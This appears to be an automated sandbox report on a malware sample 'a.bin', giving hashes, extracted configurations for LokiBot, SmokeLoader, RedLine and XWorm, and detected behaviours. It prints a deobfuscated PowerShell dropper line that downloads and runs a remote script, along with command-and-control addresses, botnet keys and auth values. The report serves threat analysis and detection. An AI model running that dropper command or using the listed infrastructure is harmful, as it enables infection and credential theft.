Resubmissions

13-06-2023 15:08

230613-sh5ehagg67 10

12-06-2023 12:37

230612-ptx8sacc46 10

09-06-2023 19:42

230609-yevzjsea3z 10

08-06-2023 16:59

230608-vhg1bahg5z 10

07-06-2023 18:26

230607-w3ealaec62 10

07-06-2023 18:23

230607-w1vjsseg31 10

06-06-2023 14:12

230606-rjb9nsea66 10

05-06-2023 13:48

230605-q395dagh57 10

02-06-2023 11:55

230602-n3t22sbe8z 10

30-05-2023 13:02

230530-p98pfsaa3x 10

General

  • Target

    a.bin

  • Size

    5KB

  • Sample

    230530-p98pfsaa3x

  • MD5

    8ce1f6882edc51f701bbe648e40dd133

  • SHA1

    496b3df4657e9d11df14a8ad267061d97249b511

  • SHA256

    188e97ba18d7394cb3949e66c8aeb062e3ea8675371d0ee2b5126b52366530ae

  • SHA512

    5826ea307fa12db5a8005fae8758314c0810e956ead3504fda7cadaccdbe737d609dfdfdc51996ab2eb350eae20398f8fbb97b16aa01f2af373c1ba20767d7d6

  • SSDEEP

    48:6jtGAK8lb9ivcfaFSfkQLJhyPFlL8thCb/IExQpwOulavTqXSfbNtm:OI0iUaakQqDgtmQpmsvNzNt

Malware Config

Extracted

Language
ps1
Deobfuscated
1
invoke-expression (new-object net.webclient).downloadstring("https://slpbridge.com/storage/images/debug2.ps1")
2
URLs
ps1.dropper

https://slpbridge.com/storage/images/debug2.ps1

Extracted

Family

lokibot

C2

http://194.180.48.58/web/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Extracted

Family

smokeloader

Version

2022

C2

http://polinamailserverip.ru/

http://lamazone.site/

http://criticalosl.tech/

http://maximprofile.net/

http://zaliphone.com/

http://humanitarydp.ug/

http://zaikaopentra.com.ug/

http://zaikaopentra-com-ug.online/

http://infomalilopera.ru/

http://jskgdhjkdfhjdkjhd844.ru/

http://jkghdj2993jdjjdjd.ru/

http://kjhgdj99fuller.ru/

http://azartnyjboy.com/

http://zalamafiapopcultur.eu/

http://hopentools.site/

http://kismamabeforyougo.com/

http://kissmafiabeforyoudied.eu/

http://gondurasonline.ug/

http://nabufixservice.name/

http://filterfullproperty.ru/

rc4.i32
1
0x8fc255ec
rc4.i32
1
0x48237f1a

Extracted

Family

redline

Botnet

dusa

C2

83.97.73.127:19045

Attributes
  • auth_value

    ee896466545fedf9de5406175fb82de5

Extracted

Family

xworm

C2

10.0.2.15:5555

Mutex

TNZstVyCMYPlDDeU

Attributes
  • install_file

    ms-update.exe

aes.plain
1
7hFMu/eZ9dON+n+qoUWF8A==

Extracted

Family

redline

Botnet

dix

C2

77.91.124.251:19065

Attributes
  • auth_value

    9b544b3d9c88af32e2f5bf8705f9a2fb

Extracted

Family

redline

Botnet

diza

C2

185.161.248.37:4138

Attributes
  • auth_value

    0d09b419c8bc967f91c68be4a17e92ee

Extracted

Family

redline

Botnet

Redline

C2

85.31.54.183:18435

Attributes
  • auth_value

    50837656cba6e4dd56bfbb4a61dadb63

Targets

    • Target

      a.bin

    • Size

      5KB

    • MD5

      8ce1f6882edc51f701bbe648e40dd133

    • SHA1

      496b3df4657e9d11df14a8ad267061d97249b511

    • SHA256

      188e97ba18d7394cb3949e66c8aeb062e3ea8675371d0ee2b5126b52366530ae

    • SHA512

      5826ea307fa12db5a8005fae8758314c0810e956ead3504fda7cadaccdbe737d609dfdfdc51996ab2eb350eae20398f8fbb97b16aa01f2af373c1ba20767d7d6

    • SSDEEP

      48:6jtGAK8lb9ivcfaFSfkQLJhyPFlL8thCb/IExQpwOulavTqXSfbNtm:OI0iUaakQqDgtmQpmsvNzNt

    • Detects Stealc stealer

    • Lokibot

      Lokibot is a Password and CryptoCoin Wallet Stealer.

    • RedLine

      RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    • SmokeLoader

      Modular backdoor trojan in use since 2014.

    • Stealc

      Stealc is an infostealer written in C++.

    • WarzoneRat, AveMaria

      WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

    • Xworm

      Xworm is a remote access trojan written in C#.

    • Warzone RAT payload

    • Downloads MZ/PE file

    • Sets file execution options in registry

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Registers COM server for autorun

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Uses the VBS compiler for execution

    • Accesses Microsoft Outlook profiles

    • Adds Run key to start application

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Legitimate hosting services abused for malware hosting/C2

    • Suspicious use of SetThreadContext

MITRE ATT&CK Enterprise v6

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.